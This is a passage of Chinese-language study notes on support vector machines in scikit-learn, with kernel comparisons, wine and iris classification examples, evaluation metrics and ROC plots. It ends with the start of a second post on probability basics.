    plt.scatter(test_x[i][0], test_x[i][1], color="blue", marker=["x", "o"][int(test_y[i] * 0.5 + 0.5)])
    plt.plot(np.linspace(0, 4, 2), a * np.linspace(0, 4, 2) - b / w[1])
    l1 = plt.scatter(0, 0, color="red") # 设置图例
    l2 = plt.scatter(0, 0, color='red')
    plt.legend(handles=[plt.scatter(0, 0, color="red", marker="o"), plt.scatter(0, 0, color="red", marker="x"),
    plt.scatter(0, 0, color="blue", marker="o"), plt.scatter(0, 0, color="blue", marker="x")],
    labels=['训练集正例点', '训练集负例点', '测试集正例点', '测试集负例点'] , loc='best') # 显示图例
    plt.show()
    训练集(最右一列为标签): [[ 4  3  1] [ 3  3  1] [ 1  1 -1]]预测数据[4, 5], [0, 0], [1, 3]的类型值分别是 [ 1 -1  1]支持向量: [[1. 1.] [3. 3.]]支持向量的标号:[2 1]每类支持向量的个数:[1 1]数据集 X 到分类超平面的距离:[ 1.5  1.  -1. ]参数(法向量)w = [0.5 0.5]分类线的斜率 a = -1.0分类平面截距 b:[-2.]系数 [[0.5 0.5]]超平面方程为 0.5x + 0.5y -2.0 = 0

    png

    10.7 非线性 SVM 与核函数的引入

    参考: 核函数与非线性支持向量机(SVM)

    10.7.2 非线性 SVM 的实现

    (1) 调用相关的库
    1
    2
    3
    4
    5
    6
    7
    8
    #调用相关的库:
    import numpy as np
    from sklearn.svm import SVC
    import matplotlib.pyplot as plt
    from sklearn.datasets import make_circles # 画圆圈的库
    import matplotlib as mpl

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    (2) 通过函数 plot_decision_boundary()实现散点图和支持向量的绘图
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    def plot_decision_boundary (model, X, y, h=0.03, draw_SV=True, title='decision_boundary'):
    """
    画分类数据集
    :param model:
    :param X:
    :param y:
    :param h: 步长
    :param draw_SV:
    :param title: 标题
    """
    X_min, X_max = X[:,0].min() - 1, X[:,0].max() + 1
    y_min, y_max = X[:,1].min() - 1, X[:, 1].max() + 1
    # 画决策边界,需要有网格,利用 np.meshgrid()生成一个坐标矩阵
    """
    语法:X,Y = numpy.meshgrid(x, y)
    输入的 x,y,就是网格点的横纵坐标列向量(非矩阵)
    输出的 X,Y,就是坐标矩阵。
    """
    xx, yy = np.meshgrid(np.arange(X_min, X_max, h),np.arange(y_min, y_max, h))
    # 预测坐标矩阵中每个点所属的类别
    label_predict = model.predict(np.stack((xx.flat, yy.flat), axis=1))
    # 将结果放入彩色图中
    label_predict = label_predict.reshape(xx.shape) # 使之与输入的形状相同
    plt.title(title)
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(()) # 隐藏坐标轴
    plt.yticks(())
    # contour 和 contourf 都是画三维等高线图的,不同点在于 contour() 是绘制轮廓线,contourf()会填充轮廓。
    plt.contourf(xx, yy, label_predict, alpha=0.5) # 用 contourf()函数为坐标矩阵中不同类别填充不同颜色
    markers = ['x', '^', 'o']
    colors = ['b', 'r', 'c'] # 蓝, 红, 青
    # 对于一维数组或者列表,unique 函数去除其中重复的元素,
    # 并按元素由大到小返回一个新的无元素重复的元组或者列表
    classes = np.unique(y)
    # 画出每一类数据的散点图
    for label in classes:
    plt.scatter(X[y == label][:, 0], X[y == label][:, 1],
    c=colors[label], s=60, marker=markers[label])
    # 标记出支持向量,将两类支持向量机用不同颜色表示出来
    if draw_SV:
    SV = model.support_vectors_ # 获取支持向量
    n = model.n_support_[0] # 第一类支持向量个数
    plt.scatter(SV[:n, 0],SV[:n, 1], s=15, c='black', marker='o')
    plt.scatter(SV[n:, 0],SV[n:, 1], s=15, c='g', marker='o')
    (3) 生成模拟分类数据集,并画出数据集
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    """
    make_circles:
    n_samples:int,optional(默认值= 100)
    生成的总点数。如果是奇数,则内圆将比外圆具有一个点。
    shuffle:bool,optional(默认值= True)
    是否洗牌样品。
    noise:双倍或无(默认=无)
    高斯噪声的标准偏差加到数据上。
    random_state:int,RandomState 实例或 None(默认)
    确定数据集重排和噪声的随机数生成。传递一个 int,用于跨多个函数调用的可重现输出。见术语表。
    factor:0 < double < 1(默认值= .8)
    内圈和外圈之间的比例因子。
    """
    X, y = make_circles(200,factor=0.1,noise=0.1) # 产生样本点
    plt.scatter(X[y == 0, 0], X[y == 0, 1], c='b', s=20, marker = 'x') # 第一类
    plt.scatter(X[y == 1, 0], X[y == 1, 1], c='r', s=20, marker = '^') # 第二类
    plt.xticks(())
    plt.yticks(())
    plt.title('数据集')
    plt.show() # 画出数据集

    png

    (4) 通过调用 SVM 函数, 分别构造线性核函数和三阶多项式核函数 SVM, 把运算的结果用图形描绘出来
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    plt.figure(figsize=(12, 10), dpi=200)
    # 使用线性核函数进行分类
    model_linear = SVC(C=1.0, kernel='linear') # 实例化,设置的核函数为线性核函数
    model_linear.fit(X, y) # 用训练集数据训练模型,和上一句配合使用

    # 画出使用线性核函数的分类边界
    plt.subplot(2, 2, 1)
    plot_decision_boundary(model_linear, X, y, title='线性核函数') # 调用画图函数
    print("采用线性核函数生成的支持向量个数:", model_linear.n_support_)

    # 使用多项式核函数进行分类
    model_poly = SVC(C=1.0, kernel='poly', degree=3, gamma="auto") # 实例化,设置的核函数为多项式核函数
    model_poly.fit(X, y) # 用训练集数据训练模型
    # 画出使用多项式核函数的分类边界
    plt.subplot(2, 2, 2)
    plot_decision_boundary(model_poly, X, y, title='多项式核函数') # 调用画图函数
    print("采用多项式函数生成的支持向量个数:", model_poly.n_support_)
    plt.show()
    采用线性核函数生成的支持向量个数:[100 100]采用多项式函数生成的支持向量个数:[100 100]

    png

    (5) 通过调用 SVC(), 分别构造 4 个高斯径向基核函数的 SVM, 对应的分别为 10, 1, 0.1, 0.01, 把运算的结果用图形描绘出来
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    plt.figure(figsize=(12, 10), dpi=200)
    # enumerate() 函数用于将一个可遍历的数据对象(如列表、元组或字符串)组合为一个索引序列,
    # 同时列出数据和数据下标,一般用在 for 循环当中。
    for j, gamma in enumerate((10, 1, 0.1, 0.01)):
    plt.subplot(2, 2, j+1)
    model_rtf= SVC(C=1.0, kernel='rbf', gamma=gamma)
    model_rtf.fit(X,y) # 高斯核函数
    #调用画图函数
    plot_decision_boundary(model_rtf, X, y, title='rbf 函数,'
    '参数 gamma='+str(gamma))
    print("rbf 函数,参数 gamma=",str(gamma),"支持向量个数:",model_rtf.n_support_)
    plt.show()
    rbf 函数,参数 gamma= 10 支持向量个数:[30  7]rbf 函数,参数 gamma= 1 支持向量个数:[9 8]rbf 函数,参数 gamma= 0.1 支持向量个数:[96 96]rbf 函数,参数 gamma= 0.01 支持向量个数:[100 100]

    png

    (6) 引申
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    from sklearn.model_selection import GridSearchCV

    tuned_parameters = [{'kernel': ['rbf'], 'gamma': [1, 0.1, 0.01],'C': [0.1, 1, 10]},
    {'kernel': ['linear'], 'C': [0.1, 1, 10]},
    {'kernel': ['poly'],'gamma': [1, 0.1, 0.01],
    'C': [0.1, 1, 10]}]
    """
    GridSearchCV()函数能实现自动调参, 把参数输进去, 就能给出最优的结果和参数
    https://blog.csdn.net/weixin_41988628/article/details/83098130
    """
    model_grid = GridSearchCV(SVC(), tuned_parameters, cv=5)
    model_grid.fit(X, y)
    print("The best parameters are %s with a score of %0.2f"
    % (model_grid.best_params_, model_grid.best_score_))
    The best parameters are {'C': 0.1, 'gamma': 1, 'kernel': 'rbf'} with a score of 1.00

    10.8 综合实例——利用 SVM 构建分类问题

    准备工作: 导入需要的模块

    1
    2
    3
    4
    5
    6
    import numpy as np
    from sklearn import svm
    from sklearn.svm import SVC # 导入 SVM 模型
    from sklearn.model_selection import train_test_split # 导入测试库
    from sklearn.datasets import load_wine # 导入 wine 数据集
    from time import time

    (1)导入数据集

    要将数据转换为 SVM 支持的数据格式: [ 1 类别标号 ] [ 特征 1 ] : [ 特征值 ] [ 特征 2 ] : [ 特征值 ]…

    sklearn 自带经典的 wine 数据集, 通过 load_wine()函数导入

    wine 数据集: https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_wine.html

    属性
    3
    每类样品[59,71,48]
    样品总数178
    维度13
    1
    2
    3
    4
    wine = load_wine()
    wine_data = wine.data
    wine_label = wine.target
    wine_data, wine_label
    (array([[1.423e+01, 1.710e+00, 2.430e+00, ..., 1.040e+00, 3.920e+00,         1.065e+03],        [1.320e+01, 1.780e+00, 2.140e+00, ..., 1.050e+00, 3.400e+00,         1.050e+03],        [1.316e+01, 2.360e+00, 2.670e+00, ..., 1.030e+00, 3.170e+00,         1.185e+03],        ...,        [1.327e+01, 4.280e+00, 2.260e+00, ..., 5.900e-01, 1.560e+00,         8.350e+02],        [1.317e+01, 2.590e+00, 2.370e+00, ..., 6.000e-01, 1.620e+00,         8.400e+02],        [1.413e+01, 4.100e+00, 2.740e+00, ..., 6.100e-01, 1.600e+00,         5.600e+02]]), array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2,        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,        2, 2]))

    (2) 数据预处理

    使用数据预处理中标准化类 StandardScaler 对数据进行标准化, 以避免数据存在严重的量纲不一致的问题

    数据的标准化(normalization)是将数据按比例缩放,使之落入一个小的特定区间。在某些比较和评价的指标处理中经常会用到,去除数据的单位限制,将其转化为无量纲的纯数值,便于不同单位或量级的指标能够进行比较和加权。

    1
    2
    3
    4
    from sklearn.preprocessing import StandardScaler

    wine_data = StandardScaler().fit_transform(wine_data) # 对数据进行标准化
    wine_data
    array([[ 1.51861254, -0.5622498 ,  0.23205254, ...,  0.36217728,         1.84791957,  1.01300893],       [ 0.24628963, -0.49941338, -0.82799632, ...,  0.40605066,         1.1134493 ,  0.96524152],       [ 0.19687903,  0.02123125,  1.10933436, ...,  0.31830389,         0.78858745,  1.39514818],       ...,       [ 0.33275817,  1.74474449, -0.38935541, ..., -1.61212515,        -1.48544548,  0.28057537],       [ 0.20923168,  0.22769377,  0.01273209, ..., -1.56825176,        -1.40069891,  0.29649784],       [ 1.39508604,  1.58316512,  1.36520822, ..., -1.52437837,        -1.42894777, -0.59516041]])

    (3) 分离数据

    将数据划分为训练集和测试集, 训练集: 测试集 = 80%: 20%

    sklearn 的 train_test_split()各函数参数含义解释(非常全)

    1
    2
    wine_train, wine_test, wine_train_label, wine_test_label = \
    train_test_split(wine_data, wine_label, test_size=0.2, random_state=100)

    (4) 以默认的 SVM 参数, 对训练数据集进行训练, 产生训练模型(以默认的 rbf 为例)

    1
    2
    3
    4
    time0 = time()
    model = SVC()
    model.fit(wine_train, wine_train_label)
    time1 = time()

    (5) 结果及分析

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    def result_show_analyse(test,test_label):
    """
    预测结果并进行分析
    """
    from datetime import datetime

    # 1、预测结果
    print("---------测试集的结果--------")
    test_pred = model.predict(test)
    print("测试集的真实结果为:\n", test_label)
    print("测试集的预测结果为:\n", test_pred)
    # 求出预测和真实一样的数目
    true = np.sum(test_pred == test_label)
    print("预测对的结果数目为:", true)
    print("预测错的结果数目为:", test_label.shape[0] - true)
    print("训练时间:", datetime.fromtimestamp(time1-time0).strftime("%M:%S:%f"))
    # 2、结果分析,给出准确率、精确率、召回率、F1 值、Cohen’s Kappa 系数
    print("---------测试集的结果分析--------")
    print("使用 SVM 预测 wine 数据的准确率是:%f"
    % (accuracy_score(test_label, test_pred)))
    print("使用 SVM 预测 wine 数据的精确率是:%f"
    % (precision_score(test_label, test_pred, average="macro")))
    # 对多分类要加 average="macro"
    print("使用 SVM 预测 wine 数据的召回率是:%f"
    % (recall_score(test_label, test_pred, average="macro")))
    print("使用 SVM 预测 wine 数据的 F1 值是:%f"
    % (f1_score(test_label, test_pred, average="macro")))
    print("使用 SVM 预测 wine 数据的 Cohen’s Kappa 系数是:%f"
    % (cohen_kappa_score(test_label, test_pred)))
    print("使用 SVM 预测 wine 数据的分类报告为:\n",
    classification_report(test_label, test_pred))
    # 3、画出预测结果和真实结果对比的图
    print("---------测试集的结果图--------")
    plt.plot(test_pred,'bo', label="预测")
    plt.plot(test_label,'r*', label="真实")
    plt.xlabel(r'测试集样本',color='r', fontsize=18)
    plt.ylabel(r'类别标签',color='r', fontsize=18, rotation=360)
    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    plt.title('测试集的实际分类和预测分类图', fontsize=18)
    plt.show()


    # 调用结果函数
    # 调用相关库
    from sklearn.metrics import accuracy_score,precision_score, \
    recall_score,f1_score,cohen_kappa_score
    from sklearn.metrics import classification_report
    import matplotlib.pyplot as plt

    # 图表中显示中文
    from pylab import *

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    result_show_analyse(wine_test,wine_test_label) # 调用结果模块
    ---------测试集的结果--------测试集的真实结果为: [1 2 0 1 2 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]测试集的预测结果为: [1 2 0 1 1 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]预测对的结果数目为:35预测错的结果数目为:1训练时间:00:00:003162---------测试集的结果分析--------使用 SVM 预测 wine 数据的准确率是:0.972222使用 SVM 预测 wine 数据的精确率是:0.979167使用 SVM 预测 wine 数据的召回率是:0.974359使用 SVM 预测 wine 数据的 F1 值是:0.975914使用 SVM 预测 wine 数据的 Cohen’s Kappa 系数是:0.956938使用 SVM 预测 wine 数据的分类报告为:               precision    recall  f1-score   support           0       1.00      1.00      1.00         8           1       0.94      1.00      0.97        15           2       1.00      0.92      0.96        13    accuracy                           0.97        36   macro avg       0.98      0.97      0.98        36weighted avg       0.97      0.97      0.97        36---------测试集的结果图--------

    png

    【Sklearn】sklearn.metrics 中的评估方法

    通常以关注的类为正类,其他类为负类。分类器在测试数据集上预测要么正确要么不正确。4 种情况出现的总数分别记作:

    名称说明
    tp(true positive)将正类预测为正类
    fn(false negative)将正类预测为负类
    fp(false positive)将负类预测为正类
    tn(true negative)将负类预测为负类

    分类 0 混淆矩阵:

    预测属于分类 0预测不属于分类 0
    实际属于分类 0tp = 8fn = 0
    实际不属于分类 0fp = 0tn = 28
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=1$$R=\frac{tp}{tp+fn}=1$$\frac{2PR}{P+R}=1$

    分类 1 混淆矩阵:

    预测属于分类 1预测不属于分类 1
    实际属于分类 1tp = 15fn = 0
    实际不属于分类 1fp = 1tn = 20
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=\frac{15}{16}=0.9375$$R=\frac{tp}{tp+fn}=1$$\frac{2PR}{P+R}=\frac{30}{31}=0.9677$

    分类 2 混淆矩阵:

    预测属于分类 2预测不属于分类 2
    实际属于分类 2tp = 12fn = 1
    实际不属于分类 2fp = 0tn = 23
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=1$$R=\frac{tp}{tp+fn}=\frac{12}{13}=0.923$$\frac{2PR}{P+R}=\frac{24}{25}=0.96$

    (6) 分类结果的混淆矩阵及图表显示

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    from sklearn import metrics


    def cm_plot(y,yp):
    conf_mx = metrics.confusion_matrix(y, yp) # 模型对于测试集的混淆矩阵
    print("测试集的混淆矩阵:\n",conf_mx)
    # 画混淆矩阵图,配色风格使用 cm.Greens
    # (太丑了, 我要用 Oranges, https://blog.csdn.net/weixin_51111267/article/details/122605388)
    plt.matshow(conf_mx,cmap=plt.cm.Oranges)
    plt.colorbar()# 颜色标签
    for x in range(len(conf_mx)):
    for y in range(len(conf_mx)):
    plt.annotate(conf_mx[x,y],xy=(x,y),horizontalalignment='center',
    verticalalignment='center')
    plt.ylabel('True label')# 坐标轴标签
    plt.xlabel('Predicted label')# 坐标轴标签
    return plt


    wine_test_pred=model.predict(wine_test)
    cm_plot(wine_test_label, wine_test_pred).show()
    测试集的混淆矩阵: [[ 8  0  0] [ 0 15  0] [ 0  1 12]]

    png

    10.9 高手点拨

    10.9.1 SMO 算法

    SVM 对应的优化算法, 以牺牲精度换取时间

    Sequential Minimal Optimism

    序列 最小 最优化 算法

    10.9.3 核函数的选取

    对于高斯径向基核函数, 可以通过求准确率, 画学习曲线来调整 gamma 值

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    #取不同 gamma 值得到的准确率
    score = []
    gamma_range = np.logspace(-10, 1, 50) # 得到不同的 gamma 值即对数刻度上均匀间隔的数
    for i in gamma_range:
    model = SVC(kernel="rbf",gamma = i, cache_size=5000)
    model.fit(wine_train, wine_train_label)
    score_gamma = model.score(wine_test, wine_test_label)
    score.append(score_gamma)
    print("最大的准确率为:",max(score))
    print("对应的 gamma 值", gamma_range[score.index(max(score))])
    plt.xlabel("gamma 取值")
    plt.ylabel("准确率")
    plt.title("gamma 的学习曲线")
    plt.plot(gamma_range,score)
    plt.show()
    最大的准确率为:1.0对应的 gamma 值 0.020235896477251554

    png

    10.9.4 多分类 ROC 曲线的绘制

    【小学生都会的机器学习】一个视频帮各位总结好了混淆矩阵、召回率、精准率、ROC 等…

    ROC 曲线绘制原理及如何用 SPSS 绘制 ROC 曲线

    ROC 曲线越接近左上角, 代表模型性能越好

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    from itertools import cycle
    from sklearn.metrics import roc_curve, auc
    from sklearn.model_selection import train_test_split
    from sklearn.preprocessing import label_binarize
    from numpy import interp


    def plot_roc(test, test_label, test_pred):
    """
    :param test: 测试样本的数据
    :param test_label: 测试样本的标签
    :param test_pred: 测试样本的预测值
    """
    class_num = sum(unique(test_label)) # 类别数
    Y_pred = test_pred
    # 对输出进行二值化
    # Y_label 样例真实标签,Y_pred 学习器预测的标签
    Y_label = label_binarize(test_label, classes=[i for i in range(class_num)])
    Y_pred = label_binarize(Y_pred, classes=[i for i in range(class_num)])
    # 计算每一类的 ROC
    # dict() 用于创建一个字典
    fpr = dict() # 假正例率(False Positive Rate , FPR)
    tpr = dict() # 真正例率(True Positive Rate , TPR)
    roc_auc = dict() # ROC 曲线下方的面积
    for i in range(class_num):
    fpr[i], tpr[i], _ = roc_curve(Y_label[:, i], Y_pred[:, i])
    roc_auc[i] = auc(fpr[i], tpr[i])
    # 计算 micro-average ROC 曲线和 ROC 面积
    fpr["micro"], tpr["micro"], _ = roc_curve(Y_label.ravel(), Y_pred.ravel())
    roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])

    # 计算 macro-average ROC 曲线 and ROC 面积
    # 第一步:汇总所有误报率 aggregate all false positive rates
    all_fpr = np.unique(np.concatenate([fpr[i] for i in range(class_num)]))

    # 第二步:在此点插值所有 ROC 曲线 interpolate all ROC curves at this points
    mean_tpr = np.zeros_like(all_fpr)
    for i in range(class_num):
    mean_tpr += interp(all_fpr, fpr[i], tpr[i])
    # 第三步:最后对其进行平均并计算 AUC Finally average it and compute AUC
    mean_tpr /= class_num
    fpr["macro"] = all_fpr
    tpr["macro"] = mean_tpr
    roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
    # 画出具体的某一类的 ROC 曲线,如第一类
    plt.figure()
    lw = 2
    plt.plot(fpr[1], tpr[2], color="darkorange",
    lw=lw, label="ROC curve (area = %0.2f)" % roc_auc[1])
    plt.plot([0, 1], [0, 1], color="navy", lw=lw, linestyle="--")
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("假正例率 False Positive Rate(FPR)")
    plt.ylabel("真正例率 True Positive Rate(TPR)")
    plt.title("Receiver operating characteristic example")
    plt.legend(loc="lower right")
    plt.show()

    # 画出所有类的 ROC 曲线
    lw = 2 # line width
    plt.figure()
    plt.plot(fpr["micro"], tpr["micro"],
    label="micro-average ROC 曲线 (area = {0:0.2f})"
    "".format(roc_auc["micro"]),
    color="deeppink", linestyle=":", linewidth=4)

    plt.plot(fpr["macro"], tpr["macro"],
    label="macro-average ROC 曲线 (area = {0:0.2f})"
    "".format(roc_auc["macro"]),
    color="navy", linestyle=":", linewidth=4)
    colors = cycle(["aqua", "darkorange", "cornflowerblue"])
    for i, color in zip(range(class_num), colors):
    plt.plot(fpr[i], tpr[i], color=color, lw=lw,
    label="ROC curve of class {0} (area = {1:0.2f})"
    "".format(i, roc_auc[i]))

    plt.plot([0, 1], [0, 1], "k--", lw=lw)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("假正例率 False Positive Rate(FPR)")
    plt.ylabel("真正例率 True Positive Rate(TPR)")
    plt.title('Some extension of Receiver operating characteristic'
    'to multi-class')
    plt.legend(loc="lower right")
    plt.show()


    # 调用画 ROC 曲线的函数
    model = SVC() # 实例化,设置模型参数
    model.fit(wine_train, wine_train_label)
    wine_test_pred = model.predict(wine_test)
    plot_roc(wine_test, wine_test_label, wine_test_pred)

    png

    png

    10.10 习题 构建基于 iris 数据集的 SVM 分类模型

    https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_iris.html

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    import numpy as np
    from sklearn import svm
    from sklearn.svm import SVC
    from sklearn.model_selection import train_test_split
    from sklearn.datasets import load_iris
    from sklearn.preprocessing import StandardScaler
    from sklearn.metrics import classification_report
    import matplotlib.pyplot as plt
    import matplotlib as mpl
    from time import time

    # (1) 读取数据集, 区分标签和数据
    iris = load_iris()
    iris_data = iris.data
    iris_label = iris.target
    # (2) 标准化数据集
    iris_data = StandardScaler().fit_transform(iris_data)
    # (3) 将数据集划分为训练集和测试集
    iris_train, iris_test, iris_train_label, iris_test_label = \
    train_test_split(iris_data, iris_label, test_size=0.2)
    # (4) 构建 SVM 模型
    model = SVC()
    model.fit(iris_train, iris_train_label)
    iris_test_pred = model.predict(iris_test)
    # (5) 输出预测测试集结果, 评价分类模型性能, 输出测试报告
    print(classification_report(iris_test_label, iris_test_pred))
    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    print("---------测试集的结果图--------")
    plt.plot(iris_test_pred,'bo', label="预测")
    plt.plot(iris_test_label,'r*', label="真实")
    plt.xlabel(r'测试集样本',color='r', fontsize=18)
    plt.ylabel(r'类别标签',color='r', fontsize=18, rotation=360)
    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    plt.title('测试集的实际分类和预测分类图', fontsize=18)
    plt.show()
                  precision    recall  f1-score   support           0       1.00      1.00      1.00         9           1       0.92      0.92      0.92        13           2       0.88      0.88      0.88         8    accuracy                           0.93        30   macro avg       0.93      0.93      0.93        30weighted avg       0.93      0.93      0.93        30---------测试集的结果图--------

    png

    ]]>
    @@ -10104,7 +10104,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80(7-9)/ - 正文

    7 描述统计规律 1——概率论基础

    7.1.3 概率和频率

    例 7.3 抛硬币

    抛掷 10 次硬币并计算正面朝上的次数,随着抛掷次数越多,在 Python 中编写程序观察事件发生的频率和概率之间的关系。

    import random


    def coin_trial():
    """
    模拟抛掷 10 次硬币
    """
    heads = 0 # 正面朝上的次数
    for i in range(10):
    if random.random() <= 0.5:
    heads += 1
    return heads


    def simulate(n):
    """
    模拟抛掷 10 * n 次硬币
    """
    trials = []
    for i in range(n):
    trials.append(coin_trial())
    return(sum(trials) / n)
    simulate(1)
    6.0
    simulate(10)
    4.5
    simulate(100)
    4.92
    simulate(1000)
    5.053
    simulate(10000)
    5.0029
    simulate(100000)
    5.01412

    7.4.1 离散型随机变量

    例 7.13 求概率函数概率分布函数

    若某公司生产的某个产品中奖率是 50%, 求购买 4 个同样的产品中奖的概率函数和概率分布函数.(伯努利试验)

    购买 4 个同样的产品为 n 重伯努利试验, 设随机变量 X 为中奖的奖品数, p 为中奖的概率, q 为不中奖的概率, 则概率函数$P _ {n}(X = k) = C^{k} _ {n}pkq{n-k}$, $p = \frac{1}{2}$, $q = \frac{1}{2}$

    X 的取值01234
    对应概率$p _ {k}$$\frac{1}{16}$$\frac{1}{4}$$\frac{3}{8}$$\frac{1}{4}$$\frac{1}{16}$

    概率分布函数如下

    $F(0) = P(X = 0) = \frac{1}{16}$

    $F(1) = P(X = 0) + P(X = 1) = \frac{5}{16}$

    $F(2) = P(X = 0) + P(X = 1) + P(X = 2) = \frac{11}{16}$

    $F(3) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) = \frac{15}{16}$

    $F(4) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) + P(X = 4) = 1$

    例 7.14 在 Python 中画出 例 7.13 的概率函数以及分布函数图

    import numpy as np
    from scipy import stats
    import matplotlib.pyplot as plt
    from matplotlib.font_manager import FontProperties
    from collections import Counter

    # rcParams 配置
    plt.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    # 为 True 时, 减号使用 unicode 编码而不是连字符号,请查看 http://en.wikipedia.org/wiki/Plus_and_minus_signs#Character_codes
    plt.rcParams['axes.unicode_minus'] = False

    def Discrete_pmf():
    xk = np.arange(5) # X 所有可能的取值[0 1 2 3 4 5]
    pk = (1 / 16, 1 / 4, 3 / 8, 1 / 4, 1 / 16) # 概率函数
    # name: 实例名称 custm, values: 两个数组的元组_LIKE,可选
    # (xk, pk) 哪里 xk 是整数,并且 pk 是介于 0 和 1 之间的非零概率吗?sum(pk) = 1。xk 和 pk 必须有相同的形状。
    dist = stats.rv_discrete(name='custm', values=(xk, pk))
    rv = dist.rvs(size=100) # rvs: 产生服从指定分布的 100 个随机数, 通过 size 给定随机数的大小
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5)) # 将窗口划分为 ax0, ax1

    ax0.set_title("概率函数")
    ax0.plot(xk, pk, 'ro', ms=8, mec='r') # 画点, X 轴为 xk, Y 轴为 pk, 红色点图, 红点大小为 8, 红点颜色为 red
    ax0.vlines(xk, 0, pk, colors='r', linestyles='-', lw=2) # 画线, 0 为 Y 轴最下方, 红色, 实线, 宽度为 2
    for i in xk: # 标注数字
    ax0.text(i, pk[i], '%.3f' % pk[i], ha='center', va='bottom')

    ax1.set_title("分布函数")
    pk1 = dist.cdf(xk) # cdf 累积分布函数
    """
    rv 数据序列(绘制的直方图高度服从这个数据序列, 标注的数据并不准确?)
    5 组(0 1 2 3 4),
    density=ture 的意思是保证该面积的积分为 1
    histtype: 直方图类型,‘bar’, ‘barstacked’, ‘step’, ‘stepfilled’
    蓝色
    透明度 0.75
    cumulative=True 频率累加
    """
    ax1.hist(rv, 5, density=True, histtype='step', facecolor='blue',
    alpha=0.75, cumulative=True) # .hist 用于绘制直方图
    for i in xk: # 标注数字
    ax1.text(i, pk1[i], '%.3f' % pk1[i], ha='center', va='bottom')
    print(Counter(rv))


    if __name__ == "__main__":
    Discrete_pmf()
    Counter({1: 30, 3: 30, 2: 28, 4: 7, 0: 5})

    png

    7.4.2 连续型随机变量

    例 7.16 正态分布

    在 Python 中输出正态分布概率密度函数${\color{Red}{f(x)}}$和对应的概率分布函数${\color{Blue}{F(x)}}$

    如果一个随机变量 X 具有概率密度函数, 则称随机变量 X 为正态分布随机变量, 并记为$X\sim N(\mu , \sigma ^{2})$

